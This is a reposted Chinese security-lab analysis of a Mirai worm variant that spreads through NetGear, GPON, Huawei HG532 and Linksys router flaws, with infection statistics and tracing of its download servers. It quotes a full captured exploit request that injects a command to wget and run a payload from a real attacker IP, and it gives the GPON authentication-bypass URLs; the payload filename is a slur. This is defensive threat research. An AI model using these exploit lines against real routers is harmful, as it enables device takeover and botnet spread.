IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

栏目: 编程工具 · 发布时间: 5年前

内容简介:近期腾讯安全云鼎实验室听风威胁感知平台监测发现一款攻击路由器的蠕虫病毒,经过分析,认定此款蠕虫是 mirai 病毒的新变种,和之前的 mirai 病毒不同,该蠕虫不仅仅通过初代 mirai 使用的 telnent 爆破进行攻击,更多通过路由器漏洞进行攻击传播。样本在传播和攻击过程中涉及到4个 PlayLoad ,均针对路由器进行攻击,我们会对相关漏洞进行介绍,并针对传播情况利用抽样数据进行统计分析。

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

一、前言

近期腾讯安全云鼎实验室听风威胁感知平台监测发现一款攻击路由器的蠕虫病毒,经过分析,认定此款蠕虫是 mirai 病毒的新变种,和之前的 mirai 病毒不同,该蠕虫不仅仅通过初代 mirai 使用的 telnent 爆破进行攻击,更多通过路由器漏洞进行攻击传播。

二、Playload 与漏洞分析

样本在传播和攻击过程中涉及到4个 PlayLoad ,均针对路由器进行攻击,我们会对相关漏洞进行介绍,并针对传播情况利用抽样数据进行统计分析。

表 PlayLoad 情况:

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

图 影响设备分布:

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

数据来源:腾讯安全云鼎实验室

上图是几款路由器漏洞影响的国家范围,中国、俄罗斯、日本和美国是受灾较为严重的国家。与国家发展程度、网络普及程度有一定关系,也与上述几款路由器的销售区域有着较强的关联。由于国产设备多,安全性不高等原因,我国未来 IoT 安全面临着巨大的挑战。

下面我们针对这四个漏洞分别进行介绍:

01 NetGear 路由器任意执行漏洞(CNNVD-201306-024)

1)漏洞分析:

POC 通过GET方法执行setup.cgi,通过todo命令执行syscmd,通过syscmd来执行下载和执行病毒的命令。

GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://46.17.47.82/gvv+-O+/tmp/nigger;sh+nigger+netgear&curpath=/&currentsetting.htm=1 HTTP/1.1rnrn

代码如下:

A、执行setup.cgi后执行setup_main:

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

B、使用 GET 和 POST 方法都可以提交 POC:

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

Todo参数后面直接调取相关的文件执行,没有做任何过滤,这里也是被利用的地方,直接调用syscmd来执行自己想要的命令。

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

2)传播情况:

图 NetGear DGN设备远程任意命令执行漏洞攻击数据抽样统计

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

数据来源:腾讯安全云鼎实验室

发起 NetGear 漏洞攻击最多的地区是俄罗斯,可以推断带有NetGear 漏洞扫描的病毒载体感染量大。

02 GPON 光纤路由器命令执行漏洞(CVE-2018-10561/62)

1)漏洞分析:

设备上运行的HTTP服务器在进行身份验证时会检查特定路径,攻击者可以利用这一特性绕过任意终端上的身份验证。

通过在URL后添加特定参数 ?images/,最终获得访问权限:

http://ip:port/menu.html?images/
http://ip:port/GponForm/diag_FORM?images/

图 GPONPlayLoad:

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

2)传播情况:

图 GPON设备远程任意命令执行漏洞攻击数据抽样统计

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

数据来源:腾讯安全云鼎实验室

此漏洞的病毒载体感染范围较大,对于中国、格鲁吉亚、埃及的影响最为广泛。中国美国的光纤发展迅速,埃及和格鲁吉亚受到中国影响,光纤发展速度也很快,也是他们受影响设备多的一个原因。

03 华为HG532系列路由器远程命令执行漏(CVE-2017-17215)

1)漏洞分析:

图 HG532 PlayLoad

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

我们可以观察POC 首先提交一个身份认证信息,之后upgrade里面的NewStatusURL标签中执行了想要执行的命令。模块在upnp中,我们找到upnp模块,并找到NEwStatusURL标签,代码直接通过SYSTEM执行命令(upg -g -u %s -t ‘Firmware Upgrade….’),没有做任何过滤。

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

2)传播情况:

图 华为HG532设备远程命令执行漏洞攻击数据抽样统计

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

数据来源:腾讯安全云鼎实验室

图 CVE-2017-17215 世界影响范围

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

数据来源:腾讯安全云鼎实验室

通过华为 HG532 设备远程命令执行的攻击统计,可以看出,利用此漏洞的病毒载体或扫描在中国、日本、俄罗斯非常活跃。

04 Linksys多款路由器 tmUnblock.cgi ttcp_ip 参数远程命令执行漏洞(CNVD-2014-01260)

1)漏洞分析:

多款Linksys路由器没有被正确过滤 ‘ttcp_ip’ 参数值,在 tmUnblock.cgi 脚本的实现上存在安全漏洞,经过身份验证的远程攻击者可利用此漏洞执行任意命令。受影响产品包括但不局限于:

E4200 E3200 E3000 E2500 E2100L E2000 E1550 E1500 E1200 E1000 E900 E300 WAG320N WAP300N WAP610N WES610N WET610N WRT610N WRT600N WRT400N WRT320N WRT160N WRT150N

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

2)传播情况:

图 Linksys 多款路由器设备远程命令执行漏洞攻击数据抽样统计

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

数据来源:腾讯安全云鼎实验室

相关漏洞样本的下载地址很固定,基本分布于拉斯维加斯、新加坡、莫斯科和阿姆斯特丹这四个城市。经过黑产链条的团伙比对,针对路由器的黑产团伙服务器的配置位置,在这几个地方部署的量确实较大。

图 病毒服务器分布图

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

数据来源:腾讯安全云鼎实验室

详细的服务器分布信息如下表所示:

表 捕获到的相关样本下载 IP 地址

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

三、样本分析

样本md5:099b88bb74e9751abb4091ac4f1d690d

源地址统计(112.28.77.217):13次,主要攻击了81、8080端口

下载IP:46.17.47.82

样本与mirai是同一个家族的样本,是mirai病毒的一个变种。代码结构和解密后的字符串均非常相似,不同的是此变种使用了3个路由器漏洞进行传播。

Mirai bot 代码的结构如下:

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

包含了攻击模块、扫描模块和结束模块三个大模块,此样本代码结构与mirai一样,只是相比增加了三种针对路由器的扫描模块。

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

与以前的mirai不同,这里检测/dev/watchdog,/dev/misc/watchdog,/dev/FTWDT101_watchdog,/dev/FTWDT101watchdog,/dev/FTWDT101/watchdog,/sbin/watchdog,/bin/watchdog,/dev/watchdog0,/etc/default/watchdog,/etc/watchdog 等来避免重启。

相比传统的mirai(/dev/watchdog,/dev/misc/watchdog)多了很多新的watchdog检测。同时包含了 Linux.Okiru 用来检测的路径(/dev/FTWDT101_watchdog,/dev/FTWDT101 watchdog)。

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

攻击服务器包含了很多相关的文件,各个操作系统平台上的,不同版本的文件。

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

样本溯源:

下图 POC 中包含了相关的下载地址:

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

通过访问链接 46.17.47.82/cutie,发现其中包含了真正的下载链接。

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

保存的路径为:/tmp/gdf,/tmp/gxy,/tmp/dhf,/tmp/ttb;

再直接访问根目录,包含了一条 Twitter 地址:

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

该 Twitter的作者Philly是一个美国人,病毒存放的路径为nigr(Philly的自称),从Twitter中未发现直接与蠕虫相关的推文。

图 相关Twitter截图

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

关于样本捕获:

通过腾讯安全云鼎实验室听风威胁感知平台进行捕捉样本,听风威胁感知平台是云鼎实验室在全球多个节点部署的蜜罐网络集群,用于捕获真实的恶意流量,每天捕获数亿次的各类攻击请求。

相关捕捉界面如下:

IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭

参考文档:

https://www.freebuf.com/vuls/171457.html

https://www.linuxidc.com/Linux/2014-02/97171.htm

https://xlab.tencent.com/cn/2018/01/05/a-new-way-to-exploit-cve-2017-17215/

腾讯安全云鼎实验室 关注云主机与云内流量的安全研究和安全运营。利用机器学习与大数据技术实时监控并分析各类风险信息,帮助客户抵御高级可持续攻击;联合腾讯所有安全实验室进行安全漏洞的研究,确保云计算平台整体的安全性。相关能力通过腾讯云开放出来,为用户提供黑客入侵检测和漏洞风险预警等服务,帮助企业解决服务器安全问题。


以上所述就是小编给大家介绍的《IoT 分析 | 路由器漏洞频发,Mirai 新变种来袭》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Ajax修炼之道

Ajax修炼之道

(美)哥特兰、高伯瑞斯、艾米亚 / 徐锋,胡冰 / 电子工业出版社 / 2006-4 / 29.8

Ajax将静态Web页面转变为充满交互的应用。现在您不需要牺牲Web应用程序部署的简单性,就可以将“胖”客户端应用程序部署到客户端。不过对于很多人业说,Ajax看起来很难。这就是我们撰写本书的原因。作为实践的指导,本书揭开了Ajax神秘的面纱,教您如何以简单的方式使用Ajax。本书内容覆盖了DHTML、Javascript和闻名已久的XmlHttp Request回调技术的基础知识。您将了解如何将......一起来看看 《Ajax修炼之道》 这本书的介绍吧!

CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

XML 在线格式化
XML 在线格式化

在线 XML 格式化压缩工具

UNIX 时间戳转换
UNIX 时间戳转换

UNIX 时间戳转换